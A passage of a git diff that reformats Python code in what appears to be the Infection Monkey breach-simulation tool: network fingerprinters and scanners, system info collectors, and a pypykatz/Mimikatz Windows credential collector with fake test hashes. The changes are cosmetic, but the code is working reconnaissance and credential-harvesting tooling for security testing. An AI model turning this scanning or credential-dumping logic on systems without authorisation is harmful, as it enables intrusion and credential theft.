)
sock.close()
return False
except socket.error as e:
if e.errno == errno.ECONNRESET:
LOG.info(
- "Connection was forcibly closed by the remote host. The host: {0} is rejecting the packet.".format(
- host
- )
+ "Connection was forcibly closed by the remote host. The host: {0} is "
+ "rejecting the packet.".format(host)
)
else:
LOG.error(
- "An unknown socket error occurred while trying the mssql fingerprint, closing socket.",
- exc_info=True,
+ "An unknown socket error occurred while trying the mssql fingerprint, "
+ "closing socket.",
+ exc_info=True,
)
sock.close()
return False
self.init_service(
- host.services, self._SCANNED_SERVICE, MSSQLFinger.SQL_BROWSER_DEFAULT_PORT
+ host.services, self._SCANNED_SERVICE, MSSQLFinger.SQL_BROWSER_DEFAULT_PORT
)
# Loop through the server data
@@ -82,7 +81,8 @@ class MSSQLFinger(HostFinger):
if len(instance_info) > 1:
host.services[self._SCANNED_SERVICE][instance_info[1]] = {}
for i in range(1, len(instance_info), 2):
- # Each instance's info is nested under its own name, if there are multiple instances
+ # Each instance's info is nested under its own name, if there are multiple
+ # instances
# each will appear under its own name
host.services[self._SCANNED_SERVICE][instance_info[1]][
instance_info[i - 1]
diff --git a/monkey/infection_monkey/network/mysqlfinger.py b/monkey/infection_monkey/network/mysqlfinger.py
index c04814c9f..d7c56a546 100644
--- a/monkey/infection_monkey/network/mysqlfinger.py
+++ b/monkey/infection_monkey/network/mysqlfinger.py
@@ -49,7 +49,7 @@ class MySQLFinger(HostFinger):
return False
version, curpos = struct_unpack_tracker_string(
- data, curpos
+ data, curpos
) # special coded to solve string parsing
version = version[0].decode()
self.init_service(host.services, SQL_SERVICE, MYSQL_PORT)
diff --git a/monkey/infection_monkey/network/network_scanner.py b/monkey/infection_monkey/network/network_scanner.py
index 0b8a75120..3d3c2c65a 100644
--- a/monkey/infection_monkey/network/network_scanner.py
+++ b/monkey/infection_monkey/network/network_scanner.py
@@ -44,23 +44,26 @@ class NetworkScanner(object):
def _get_inaccessible_subnets_ips(self):
"""
For each of the machine's IPs, checks if it's in one of the subnets specified in the
- 'inaccessible_subnets' config value. If so, all other subnets in the config value shouldn't be accessible.
+ 'inaccessible_subnets' config value. If so, all other subnets in the config value
+ shouldn't be accessible.
All these subnets are returned.
- :return: A list of subnets that shouldn't be accessible from the machine the monkey is running on.
+ :return: A list of subnets that shouldn't be accessible from the machine the monkey is
+ running on.
"""
subnets_to_scan = []
if len(WormConfiguration.inaccessible_subnets) > 1:
for subnet_str in WormConfiguration.inaccessible_subnets:
if NetworkScanner._is_any_ip_in_subnet(
- [str(x) for x in self._ip_addresses], subnet_str
+ [str(x) for x in self._ip_addresses], subnet_str
):
- # If machine has IPs from 2 different subnets in the same group, there's no point checking the other
+ # If machine has IPs from 2 different subnets in the same group, there's no
+ # point checking the other
# subnet.
for other_subnet_str in WormConfiguration.inaccessible_subnets:
if other_subnet_str == subnet_str:
continue
if not NetworkScanner._is_any_ip_in_subnet(
- [str(x) for x in self._ip_addresses], other_subnet_str
+ [str(x) for x in self._ip_addresses], other_subnet_str
):
subnets_to_scan.append(NetworkRange.get_range_obj(other_subnet_str))
break
@@ -74,13 +77,16 @@ class NetworkScanner(object):
:param stop_callback: A callback to check at any point if we should stop scanning
:return: yields a sequence of VictimHost instances
"""
- # We currently use the ITERATION_BLOCK_SIZE as the pool size, however, this may not be the best decision
- # However, the decision what ITERATION_BLOCK_SIZE also requires balancing network usage (pps and bw)
- # Because we are using this to spread out IO heavy tasks, we can probably go a lot higher than CPU core size
+ # We currently use the ITERATION_BLOCK_SIZE as the pool size, however, this may not be
+ # the best decision
+        # However, choosing ITERATION_BLOCK_SIZE also requires balancing network usage (
+        # pps and bw)
+ # Because we are using this to spread out IO heavy tasks, we can probably go a lot higher
+ # than CPU core size
# But again, balance
pool = Pool(ITERATION_BLOCK_SIZE)
victim_generator = VictimHostGenerator(
- self._ranges, WormConfiguration.blocked_ips, local_ips()
+ self._ranges, WormConfiguration.blocked_ips, local_ips()
)
victims_count = 0
diff --git a/monkey/infection_monkey/network/ping_scanner.py b/monkey/infection_monkey/network/ping_scanner.py
index dd1577e47..3e9c22492 100644
--- a/monkey/infection_monkey/network/ping_scanner.py
+++ b/monkey/infection_monkey/network/ping_scanner.py
@@ -34,9 +34,9 @@ class PingScanner(HostScanner, HostFinger):
timeout /= 1000
return 0 == subprocess.call(
- ["ping", PING_COUNT_FLAG, "1", PING_TIMEOUT_FLAG, str(timeout), host.ip_addr],
- stdout=self._devnull,
- stderr=self._devnull,
+ ["ping", PING_COUNT_FLAG, "1", PING_TIMEOUT_FLAG, str(timeout), host.ip_addr],
+ stdout=self._devnull,
+ stderr=self._devnull,
)
def get_host_fingerprint(self, host):
@@ -46,10 +46,10 @@ class PingScanner(HostScanner, HostFinger):
timeout /= 1000
sub_proc = subprocess.Popen(
- ["ping", PING_COUNT_FLAG, "1", PING_TIMEOUT_FLAG, str(timeout), host.ip_addr],
- stdout=subprocess.PIPE,
- stderr=subprocess.PIPE,
- text=True,
+ ["ping", PING_COUNT_FLAG, "1", PING_TIMEOUT_FLAG, str(timeout), host.ip_addr],
+ stdout=subprocess.PIPE,
+ stderr=subprocess.PIPE,
+ text=True,
)
output = " ".join(sub_proc.communicate())
@@ -59,7 +59,8 @@ class PingScanner(HostScanner, HostFinger):
ttl = int(regex_result.group(0))
if ttl <= LINUX_TTL:
host.os["type"] = "linux"
- else: # as far we we know, could also be OSX/BSD but lets handle that when it comes up.
+            else:  # as far as we know, could also be OSX/BSD but let's handle that when it
+ # comes up.
host.os["type"] = "windows"
host.icmp = True
diff --git a/monkey/infection_monkey/network/postgresql_finger.py b/monkey/infection_monkey/network/postgresql_finger.py
index 16f6327f9..db88873f0 100644
--- a/monkey/infection_monkey/network/postgresql_finger.py
+++ b/monkey/infection_monkey/network/postgresql_finger.py
@@ -17,32 +17,32 @@ class PostgreSQLFinger(HostFinger):
# Class related consts
_SCANNED_SERVICE = "PostgreSQL"
POSTGRESQL_DEFAULT_PORT = 5432
- CREDS = {"username": ID_STRING, "password": ID_STRING}
+ CREDS = {"username":ID_STRING, "password":ID_STRING}
CONNECTION_DETAILS = {
- "ssl_conf": "SSL is configured on the PostgreSQL server.\n",
- "ssl_not_conf": "SSL is NOT configured on the PostgreSQL server.\n",
- "all_ssl": "SSL connections can be made by all.\n",
- "all_non_ssl": "Non-SSL connections can be made by all.\n",
- "selected_ssl": "SSL connections can be made by selected hosts only OR "
- "non-SSL usage is forced.\n",
- "selected_non_ssl": "Non-SSL connections can be made by selected hosts only OR "
- "SSL usage is forced.\n",
- "only_selected": "Only selected hosts can make connections (SSL or non-SSL).\n",
+ "ssl_conf":"SSL is configured on the PostgreSQL server.\n",
+ "ssl_not_conf":"SSL is NOT configured on the PostgreSQL server.\n",
+ "all_ssl":"SSL connections can be made by all.\n",
+ "all_non_ssl":"Non-SSL connections can be made by all.\n",
+ "selected_ssl":"SSL connections can be made by selected hosts only OR "
+ "non-SSL usage is forced.\n",
+ "selected_non_ssl":"Non-SSL connections can be made by selected hosts only OR "
+ "SSL usage is forced.\n",
+ "only_selected":"Only selected hosts can make connections (SSL or non-SSL).\n",
}
RELEVANT_EX_SUBSTRINGS = {
- "no_auth": "password authentication failed",
- "no_entry": "entry for host", # "no pg_hba.conf entry for host" but filename may be diff
+ "no_auth":"password authentication failed",
+ "no_entry":"entry for host", # "no pg_hba.conf entry for host" but filename may be diff
}
def get_host_fingerprint(self, host):
try:
psycopg2.connect(
- host=host.ip_addr,
- port=self.POSTGRESQL_DEFAULT_PORT,
- user=self.CREDS["username"],
- password=self.CREDS["password"],
- sslmode="prefer",
- connect_timeout=MEDIUM_REQUEST_TIMEOUT,
+ host=host.ip_addr,
+ port=self.POSTGRESQL_DEFAULT_PORT,
+ user=self.CREDS["username"],
+ password=self.CREDS["password"],
+ sslmode="prefer",
+ connect_timeout=MEDIUM_REQUEST_TIMEOUT,
) # don't need to worry about DB name; creds are wrong, won't check
# if it comes here, the creds worked
@@ -50,13 +50,15 @@ class PostgreSQLFinger(HostFinger):
# perhaps the service is a honeypot
self.init_service(host.services, self._SCANNED_SERVICE, self.POSTGRESQL_DEFAULT_PORT)
host.services[self._SCANNED_SERVICE]["communication_encryption_details"] = (
- "The PostgreSQL server was unexpectedly accessible with the credentials - "
- + f"user: '{self.CREDS['username']}' and password: '{self.CREDS['password']}'. Is this a honeypot?"
+ "The PostgreSQL server was unexpectedly accessible with the credentials - "
+ + f"user: '{self.CREDS['username']}' and password: '"
+ f"{self.CREDS['password']}'. Is this a honeypot?"
)
return True
except psycopg2.OperationalError as ex:
- # try block will throw an OperationalError since the credentials are wrong, which we then analyze
+ # try block will throw an OperationalError since the credentials are wrong, which we
+ # then analyze
try:
exception_string = str(ex)
@@ -92,7 +94,7 @@ class PostgreSQLFinger(HostFinger):
self.get_connection_details_ssl_not_configured(exceptions)
host.services[self._SCANNED_SERVICE]["communication_encryption_details"] = "".join(
- self.ssl_connection_details
+ self.ssl_connection_details
)
@staticmethod
@@ -120,7 +122,7 @@ class PostgreSQLFinger(HostFinger):
self.ssl_connection_details.append(self.CONNECTION_DETAILS["all_non_ssl"])
else:
if (
- ssl_selected_comms_only
+ ssl_selected_comms_only
): # if only selected SSL allowed and only selected non-SSL allowed
self.ssl_connection_details[-1] = self.CONNECTION_DETAILS["only_selected"]
else:
diff --git a/monkey/infection_monkey/network/smbfinger.py b/monkey/infection_monkey/network/smbfinger.py
index 457d0213d..795ac2be5 100644
--- a/monkey/infection_monkey/network/smbfinger.py
+++ b/monkey/infection_monkey/network/smbfinger.py
@@ -14,9 +14,9 @@ LOG = logging.getLogger(__name__)
class Packet:
fields = odict(
- [
- ("data", ""),
- ]
+ [
+ ("data", ""),
+ ]
)
def __init__(self, **kw):
@@ -38,20 +38,20 @@ class Packet:
# SMB Packets
class SMBHeader(Packet):
fields = odict(
- [
- ("proto", b"\xff\x53\x4d\x42"),
- ("cmd", b"\x72"),
- ("errorcode", b"\x00\x00\x00\x00"),
- ("flag1", b"\x00"),
- ("flag2", b"\x00\x00"),
- ("pidhigh", b"\x00\x00"),
- ("signature", b"\x00\x00\x00\x00\x00\x00\x00\x00"),
- ("reserved", b"\x00\x00"),
- ("tid", b"\x00\x00"),
- ("pid", b"\x00\x00"),
- ("uid", b"\x00\x00"),
- ("mid", b"\x00\x00"),
- ]
+ [
+ ("proto", b"\xff\x53\x4d\x42"),
+ ("cmd", b"\x72"),
+ ("errorcode", b"\x00\x00\x00\x00"),
+ ("flag1", b"\x00"),
+ ("flag2", b"\x00\x00"),
+ ("pidhigh", b"\x00\x00"),
+ ("signature", b"\x00\x00\x00\x00\x00\x00\x00\x00"),
+ ("reserved", b"\x00\x00"),
+ ("tid", b"\x00\x00"),
+ ("pid", b"\x00\x00"),
+ ("uid", b"\x00\x00"),
+ ("mid", b"\x00\x00"),
+ ]
)
@@ -64,55 +64,63 @@ class SMBNego(Packet):
class SMBNegoFingerData(Packet):
fields = odict(
- [
- ("separator1", b"\x02"),
- (
- "dialect1",
- b"\x50\x43\x20\x4e\x45\x54\x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31\x2e\x30\x00",
- ),
- ("separator2", b"\x02"),
- ("dialect2", b"\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00"),
- ("separator3", b"\x02"),
- (
- "dialect3",
- b"\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57\x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x31\x61\x00",
- ),
- ("separator4", b"\x02"),
- ("dialect4", b"\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00"),
- ("separator5", b"\x02"),
- ("dialect5", b"\x4c\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00"),
- ("separator6", b"\x02"),
- ("dialect6", b"\x4e\x54\x20\x4c\x4d\x20\x30\x2e\x31\x32\x00"),
- ]
+ [
+ ("separator1", b"\x02"),
+ (
+ "dialect1",
+ b"\x50\x43\x20\x4e\x45\x54\x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d"
+ b"\x20\x31\x2e\x30\x00",
+ ),
+ ("separator2", b"\x02"),
+ ("dialect2", b"\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00"),
+ ("separator3", b"\x02"),
+ (
+ "dialect3",
+ b"\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57\x6f\x72\x6b\x67\x72"
+ b"\x6f\x75\x70\x73\x20\x33\x2e\x31\x61\x00",
+ ),
+ ("separator4", b"\x02"),
+ ("dialect4", b"\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00"),
+ ("separator5", b"\x02"),
+ ("dialect5", b"\x4c\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00"),
+ ("separator6", b"\x02"),
+ ("dialect6", b"\x4e\x54\x20\x4c\x4d\x20\x30\x2e\x31\x32\x00"),
+ ]
)
class SMBSessionFingerData(Packet):
fields = odict(
- [
- ("wordcount", b"\x0c"),
- ("AndXCommand", b"\xff"),
- ("reserved", b"\x00"),
- ("andxoffset", b"\x00\x00"),
- ("maxbuff", b"\x04\x11"),
- ("maxmpx", b"\x32\x00"),
- ("vcnum", b"\x00\x00"),
- ("sessionkey", b"\x00\x00\x00\x00"),
- ("securitybloblength", b"\x4a\x00"),
- ("reserved2", b"\x00\x00\x00\x00"),
- ("capabilities", b"\xd4\x00\x00\xa0"),
- ("bcc1", ""),
- (
- "Data",
- b"\x60\x48\x06\x06\x2b\x06\x01\x05\x05\x02\xa0\x3e\x30\x3c\xa0\x0e\x30\x0c\x06\x0a\x2b\x06\x01\x04\x01\x82\x37\x02"
- b"\x02\x0a\xa2\x2a\x04\x28\x4e\x54\x4c\x4d\x53\x53\x50\x00\x01\x00\x00\x00\x07\x82\x08\xa2\x00\x00\x00\x00\x00\x00"
- b"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x01\x28\x0a\x00\x00\x00\x0f\x00\x57\x00\x69\x00\x6e\x00\x64\x00\x6f"
- b"\x00\x77\x00\x73\x00\x20\x00\x32\x00\x30\x00\x30\x00\x32\x00\x20\x00\x53\x00\x65\x00\x72\x00\x76\x00\x69\x00\x63"
- b"\x00\x65\x00\x20\x00\x50\x00\x61\x00\x63\x00\x6b\x00\x20\x00\x33\x00\x20\x00\x32\x00\x36\x00\x30\x00\x30\x00\x00"
- b"\x00\x57\x00\x69\x00\x6e\x00\x64\x00\x6f\x00\x77\x00\x73\x00\x20\x00\x32\x00\x30\x00\x30\x00\x32\x00\x20\x00\x35"
- b"\x00\x2e\x00\x31\x00\x00\x00\x00\x00",
- ),
- ]
+ [
+ ("wordcount", b"\x0c"),
+ ("AndXCommand", b"\xff"),
+ ("reserved", b"\x00"),
+ ("andxoffset", b"\x00\x00"),
+ ("maxbuff", b"\x04\x11"),
+ ("maxmpx", b"\x32\x00"),
+ ("vcnum", b"\x00\x00"),
+ ("sessionkey", b"\x00\x00\x00\x00"),
+ ("securitybloblength", b"\x4a\x00"),
+ ("reserved2", b"\x00\x00\x00\x00"),
+ ("capabilities", b"\xd4\x00\x00\xa0"),
+ ("bcc1", ""),
+ (
+ "Data",
+ b"\x60\x48\x06\x06\x2b\x06\x01\x05\x05\x02\xa0\x3e\x30\x3c\xa0\x0e\x30\x0c"
+ b"\x06\x0a\x2b\x06\x01\x04\x01\x82\x37\x02"
+ b"\x02\x0a\xa2\x2a\x04\x28\x4e\x54\x4c\x4d\x53\x53\x50\x00\x01\x00\x00\x00"
+ b"\x07\x82\x08\xa2\x00\x00\x00\x00\x00\x00"
+ b"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x01\x28\x0a\x00\x00\x00\x0f"
+ b"\x00\x57\x00\x69\x00\x6e\x00\x64\x00\x6f"
+ b"\x00\x77\x00\x73\x00\x20\x00\x32\x00\x30\x00\x30\x00\x32\x00\x20\x00\x53"
+ b"\x00\x65\x00\x72\x00\x76\x00\x69\x00\x63"
+ b"\x00\x65\x00\x20\x00\x50\x00\x61\x00\x63\x00\x6b\x00\x20\x00\x33\x00\x20"
+ b"\x00\x32\x00\x36\x00\x30\x00\x30\x00\x00"
+ b"\x00\x57\x00\x69\x00\x6e\x00\x64\x00\x6f\x00\x77\x00\x73\x00\x20\x00\x32"
+ b"\x00\x30\x00\x30\x00\x32\x00\x20\x00\x35"
+ b"\x00\x2e\x00\x31\x00\x00\x00\x00\x00",
+ ),
+ ]
)
def calculate(self):
@@ -159,10 +167,10 @@ class SMBFinger(HostFinger):
if data[8:10] == b"\x73\x16":
length = struct.unpack(" dict:
- return {"environment": get_monkey_environment()}
+ return {"environment": get_monkey_environment()}
diff --git a/monkey/infection_monkey/system_info/collectors/hostname_collector.py b/monkey/infection_monkey/system_info/collectors/hostname_collector.py
index 0aeecd9fb..783a0d4fd 100644
--- a/monkey/infection_monkey/system_info/collectors/hostname_collector.py
+++ b/monkey/infection_monkey/system_info/collectors/hostname_collector.py
@@ -12,4 +12,4 @@ class HostnameCollector(SystemInfoCollector):
super().__init__(name=HOSTNAME_COLLECTOR)
def collect(self) -> dict:
- return {"hostname": socket.getfqdn()}
+ return {"hostname": socket.getfqdn()}
diff --git a/monkey/infection_monkey/system_info/collectors/process_list_collector.py b/monkey/infection_monkey/system_info/collectors/process_list_collector.py
index a95ac385b..6fae4144b 100644
--- a/monkey/infection_monkey/system_info/collectors/process_list_collector.py
+++ b/monkey/infection_monkey/system_info/collectors/process_list_collector.py
@@ -30,22 +30,23 @@ class ProcessListCollector(SystemInfoCollector):
for process in psutil.process_iter():
try:
processes[process.pid] = {
- "name": process.name(),
- "pid": process.pid,
- "ppid": process.ppid(),
- "cmdline": " ".join(process.cmdline()),
- "full_image_path": process.exe(),
+ "name": process.name(),
+ "pid": process.pid,
+ "ppid": process.ppid(),
+ "cmdline": " ".join(process.cmdline()),
+ "full_image_path": process.exe(),
}
except (psutil.AccessDenied, WindowsError):
- # we may be running as non root and some processes are impossible to acquire in Windows/Linux.
+ # we may be running as non root and some processes are impossible to acquire in
+ # Windows/Linux.
# In this case we'll just add what we know.
processes[process.pid] = {
- "name": "null",
- "pid": process.pid,
- "ppid": process.ppid(),
- "cmdline": "ACCESS DENIED",
- "full_image_path": "null",
+ "name": "null",
+ "pid": process.pid,
+ "ppid": process.ppid(),
+ "cmdline": "ACCESS DENIED",
+ "full_image_path": "null",
}
continue
- return {"process_list": processes}
+ return {"process_list": processes}
diff --git a/monkey/infection_monkey/system_info/collectors/scoutsuite_collector/scoutsuite_collector.py b/monkey/infection_monkey/system_info/collectors/scoutsuite_collector/scoutsuite_collector.py
index ec8a5e488..ba5cda49d 100644
--- a/monkey/infection_monkey/system_info/collectors/scoutsuite_collector/scoutsuite_collector.py
+++ b/monkey/infection_monkey/system_info/collectors/scoutsuite_collector/scoutsuite_collector.py
@@ -24,10 +24,10 @@ def scan_cloud_security(cloud_type: CloudProviders):
def run_scoutsuite(cloud_type: str) -> Union[BaseProvider, dict]:
return ScoutSuite.api_run.run(
- provider=cloud_type,
- aws_access_key_id=WormConfiguration.aws_access_key_id,
- aws_secret_access_key=WormConfiguration.aws_secret_access_key,
- aws_session_token=WormConfiguration.aws_session_token,
+ provider=cloud_type,
+ aws_access_key_id=WormConfiguration.aws_access_key_id,
+ aws_secret_access_key=WormConfiguration.aws_secret_access_key,
+ aws_session_token=WormConfiguration.aws_session_token,
)
diff --git a/monkey/infection_monkey/system_info/netstat_collector.py b/monkey/infection_monkey/system_info/netstat_collector.py
index d35b4c1fb..0d8b73cb9 100644
--- a/monkey/infection_monkey/system_info/netstat_collector.py
+++ b/monkey/infection_monkey/system_info/netstat_collector.py
@@ -1,4 +1,5 @@
-# Inspired by Giampaolo Rodola's psutil example from https://github.com/giampaolo/psutil/blob/master/scripts/netstat.py
+# Inspired by Giampaolo Rodola's psutil example from
+# https://github.com/giampaolo/psutil/blob/master/scripts/netstat.py
import logging
import socket
@@ -19,10 +20,10 @@ class NetstatCollector(object):
AF_INET6 = getattr(socket, "AF_INET6", object())
proto_map = {
- (AF_INET, SOCK_STREAM): "tcp",
- (AF_INET6, SOCK_STREAM): "tcp6",
- (AF_INET, SOCK_DGRAM): "udp",
- (AF_INET6, SOCK_DGRAM): "udp6",
+ (AF_INET, SOCK_STREAM): "tcp",
+ (AF_INET6, SOCK_STREAM): "tcp6",
+ (AF_INET, SOCK_DGRAM): "udp",
+ (AF_INET6, SOCK_DGRAM): "udp6",
}
@staticmethod
@@ -33,11 +34,11 @@ class NetstatCollector(object):
@staticmethod
def _parse_connection(c):
return {
- "proto": NetstatCollector.proto_map[(c.family, c.type)],
- "local_address": c.laddr[0],
- "local_port": c.laddr[1],
- "remote_address": c.raddr[0] if c.raddr else None,
- "remote_port": c.raddr[1] if c.raddr else None,
- "status": c.status,
- "pid": c.pid,
+ "proto": NetstatCollector.proto_map[(c.family, c.type)],
+ "local_address": c.laddr[0],
+ "local_port": c.laddr[1],
+ "remote_address": c.raddr[0] if c.raddr else None,
+ "remote_port": c.raddr[1] if c.raddr else None,
+ "status": c.status,
+ "pid": c.pid,
}
diff --git a/monkey/infection_monkey/system_info/system_info_collector.py b/monkey/infection_monkey/system_info/system_info_collector.py
index ac269f5b0..fe160de16 100644
--- a/monkey/infection_monkey/system_info/system_info_collector.py
+++ b/monkey/infection_monkey/system_info/system_info_collector.py
@@ -7,9 +7,12 @@ from infection_monkey.utils.plugins.plugin import Plugin
class SystemInfoCollector(Plugin, metaclass=ABCMeta):
"""
- ABC for system info collection. See system_info_collector_handler for more info. Basically, to implement a new system info
- collector, inherit from this class in an implementation in the infection_monkey.system_info.collectors class, and override
- the 'collect' method. Don't forget to parse your results in the Monkey Island and to add the collector to the configuration
+ ABC for system info collection. See system_info_collector_handler for more info. Basically,
+ to implement a new system info
+ collector, inherit from this class in an implementation in the
+ infection_monkey.system_info.collectors class, and override
+ the 'collect' method. Don't forget to parse your results in the Monkey Island and to add the
+ collector to the configuration
as well - see monkey_island.cc.services.processing.system_info_collectors for examples.
See the Wiki page "How to add a new System Info Collector to the Monkey?" for a detailed guide.
diff --git a/monkey/infection_monkey/system_info/system_info_collectors_handler.py b/monkey/infection_monkey/system_info/system_info_collectors_handler.py
index 9c883084c..5a77ee9e9 100644
--- a/monkey/infection_monkey/system_info/system_info_collectors_handler.py
+++ b/monkey/infection_monkey/system_info/system_info_collectors_handler.py
@@ -24,12 +24,11 @@ class SystemInfoCollectorsHandler(object):
# If we failed one collector, no need to stop execution. Log and continue.
LOG.error("Collector {} failed. Error info: {}".format(collector.name, e))
LOG.info(
- "All system info collectors executed. Total {} executed, out of which {} collected successfully.".format(
- len(self.collectors_list), successful_collections
- )
+ "All system info collectors executed. Total {} executed, out of which {} "
+ "collected successfully.".format(len(self.collectors_list), successful_collections)
)
- SystemInfoTelem({"collectors": system_info_telemetry}).send()
+ SystemInfoTelem({"collectors": system_info_telemetry}).send()
@staticmethod
def config_to_collectors_list() -> Sequence[SystemInfoCollector]:
diff --git a/monkey/infection_monkey/system_info/windows_cred_collector/mimikatz_cred_collector.py b/monkey/infection_monkey/system_info/windows_cred_collector/mimikatz_cred_collector.py
index 0bed5c7f8..579cfb037 100644
--- a/monkey/infection_monkey/system_info/windows_cred_collector/mimikatz_cred_collector.py
+++ b/monkey/infection_monkey/system_info/windows_cred_collector/mimikatz_cred_collector.py
@@ -22,5 +22,5 @@ class MimikatzCredentialCollector(object):
# Lets not use "." and "$" in keys, because it will confuse mongo.
# Ideally we should refactor island not to use a dict and simply parse credential list.
key = cred.username.replace(".", ",").replace("$", "")
- cred_dict.update({key: cred.to_dict()})
+ cred_dict.update({key: cred.to_dict()})
return cred_dict
diff --git a/monkey/infection_monkey/system_info/windows_cred_collector/pypykatz_handler.py b/monkey/infection_monkey/system_info/windows_cred_collector/pypykatz_handler.py
index 23bcce771..11415ddac 100644
--- a/monkey/infection_monkey/system_info/windows_cred_collector/pypykatz_handler.py
+++ b/monkey/infection_monkey/system_info/windows_cred_collector/pypykatz_handler.py
@@ -43,7 +43,7 @@ def _get_creds_from_pypykatz_session(pypykatz_session: Dict) -> List[WindowsCred
def _get_creds_from_pypykatz_creds(
- pypykatz_creds: List[PypykatzCredential],
+ pypykatz_creds: List[PypykatzCredential],
) -> List[WindowsCredentials]:
creds = _filter_empty_creds(pypykatz_creds)
return [_get_windows_cred(cred) for cred in creds]
@@ -72,7 +72,7 @@ def _get_windows_cred(pypykatz_cred: PypykatzCredential):
if "LMhash" in pypykatz_cred:
lm_hash = _hash_to_string(pypykatz_cred["LMhash"])
return WindowsCredentials(
- username=username, password=password, ntlm_hash=ntlm_hash, lm_hash=lm_hash
+ username=username, password=password, ntlm_hash=ntlm_hash, lm_hash=lm_hash
)
diff --git a/monkey/infection_monkey/system_info/windows_cred_collector/test_pypykatz_handler.py b/monkey/infection_monkey/system_info/windows_cred_collector/test_pypykatz_handler.py
index f2d9565b1..89b570bad 100644
--- a/monkey/infection_monkey/system_info/windows_cred_collector/test_pypykatz_handler.py
+++ b/monkey/infection_monkey/system_info/windows_cred_collector/test_pypykatz_handler.py
@@ -8,119 +8,123 @@ from infection_monkey.system_info.windows_cred_collector.pypykatz_handler import
class TestPypykatzHandler(TestCase):
# Made up credentials, but structure of dict should be roughly the same
PYPYKATZ_SESSION = {
- "authentication_id": 555555,
- "session_id": 3,
- "username": "Monkey",
- "domainname": "ReAlDoMaIn",
- "logon_server": "ReAlDoMaIn",
- "logon_time": "2020-06-02T04:53:45.256562+00:00",
- "sid": "S-1-6-25-260123139-3611579848-5589493929-3021",
- "luid": 123086,
- "msv_creds": [
+ "authentication_id": 555555,
+ "session_id": 3,
+ "username": "Monkey",
+ "domainname": "ReAlDoMaIn",
+ "logon_server": "ReAlDoMaIn",
+ "logon_time": "2020-06-02T04:53:45.256562+00:00",
+ "sid": "S-1-6-25-260123139-3611579848-5589493929-3021",
+ "luid": 123086,
+ "msv_creds": [
{
- "username": "monkey",
- "domainname": "ReAlDoMaIn",
- "NThash": b"1\xb7 Dict:
return {
- "username": self.username,
- "password": self.password,
- "ntlm_hash": self.ntlm_hash,
- "lm_hash": self.lm_hash,
+ "username": self.username,
+ "password": self.password,
+ "ntlm_hash": self.ntlm_hash,
+ "lm_hash": self.lm_hash,
}
diff --git a/monkey/infection_monkey/system_info/wmi_consts.py b/monkey/infection_monkey/system_info/wmi_consts.py
index 71366a466..13913f349 100644
--- a/monkey/infection_monkey/system_info/wmi_consts.py
+++ b/monkey/infection_monkey/system_info/wmi_consts.py
@@ -17,7 +17,7 @@ WMI_CLASSES = {
# monkey should run as *** SYSTEM *** !!!
#
WMI_LDAP_CLASSES = {
- "ds_user": (
+ "ds_user": (
"DS_sAMAccountName",
"DS_userPrincipalName",
"DS_sAMAccountType",
@@ -36,7 +36,7 @@ WMI_LDAP_CLASSES = {
"DS_logonCount",
"DS_accountExpires",
),
- "ds_group": (
+ "ds_group": (
"DS_whenChanged",
"DS_whenCreated",
"DS_sAMAccountName",
@@ -52,7 +52,7 @@ WMI_LDAP_CLASSES = {
"DS_distinguishedName",
"ADSIPath",
),
- "ds_computer": (
+ "ds_computer": (
"DS_dNSHostName",
"ADSIPath",
"DS_accountExpires",
diff --git a/monkey/infection_monkey/system_singleton.py b/monkey/infection_monkey/system_singleton.py
index 9576ff9f7..e1a7e467e 100644
--- a/monkey/infection_monkey/system_singleton.py
+++ b/monkey/infection_monkey/system_singleton.py
@@ -38,13 +38,14 @@ class WindowsSystemSingleton(_SystemSingleton):
assert self._mutex_handle is None, "Singleton already locked"
handle = ctypes.windll.kernel32.CreateMutexA(
- None, ctypes.c_bool(True), ctypes.c_char_p(self._mutex_name.encode())
+ None, ctypes.c_bool(True), ctypes.c_char_p(self._mutex_name.encode())
)
last_error = ctypes.windll.kernel32.GetLastError()
if not handle:
LOG.error(
- "Cannot acquire system singleton %r, unknown error %d", self._mutex_name, last_error
+ "Cannot acquire system singleton %r, unknown error %d", self._mutex_name,
+ last_error
)
return False
if winerror.ERROR_ALREADY_EXISTS == last_error:
@@ -80,10 +81,10 @@ class LinuxSystemSingleton(_SystemSingleton):
sock.bind("\0" + self._unix_sock_name)
except socket.error as e:
LOG.error(
- "Cannot acquire system singleton %r, error code %d, error: %s",
- self._unix_sock_name,
- e.args[0],
- e.args[1],
+ "Cannot acquire system singleton %r, error code %d, error: %s",
+ self._unix_sock_name,
+ e.args[0],
+ e.args[1],
)
return False
diff --git a/monkey/infection_monkey/telemetry/attack/attack_telem.py b/monkey/infection_monkey/telemetry/attack/attack_telem.py
index 125906c74..87361c5f5 100644
--- a/monkey/infection_monkey/telemetry/attack/attack_telem.py
+++ b/monkey/infection_monkey/telemetry/attack/attack_telem.py
@@ -18,4 +18,4 @@ class AttackTelem(BaseTelem):
telem_category = TelemCategoryEnum.ATTACK
def get_data(self):
- return {"status": self.status.value, "technique": self.technique}
+ return {"status": self.status.value, "technique": self.technique}
diff --git a/monkey/infection_monkey/telemetry/attack/t1005_telem.py b/monkey/infection_monkey/telemetry/attack/t1005_telem.py
index 545bb47d3..3214dea6e 100644
--- a/monkey/infection_monkey/telemetry/attack/t1005_telem.py
+++ b/monkey/infection_monkey/telemetry/attack/t1005_telem.py
@@ -15,5 +15,5 @@ class T1005Telem(AttackTelem):
def get_data(self):
data = super(T1005Telem, self).get_data()
- data.update({"gathered_data_type": self.gathered_data_type, "info": self.info})
+ data.update({"gathered_data_type": self.gathered_data_type, "info": self.info})
return data
diff --git a/monkey/infection_monkey/telemetry/attack/t1064_telem.py b/monkey/infection_monkey/telemetry/attack/t1064_telem.py
index f8cdf379c..8a1acbfdf 100644
--- a/monkey/infection_monkey/telemetry/attack/t1064_telem.py
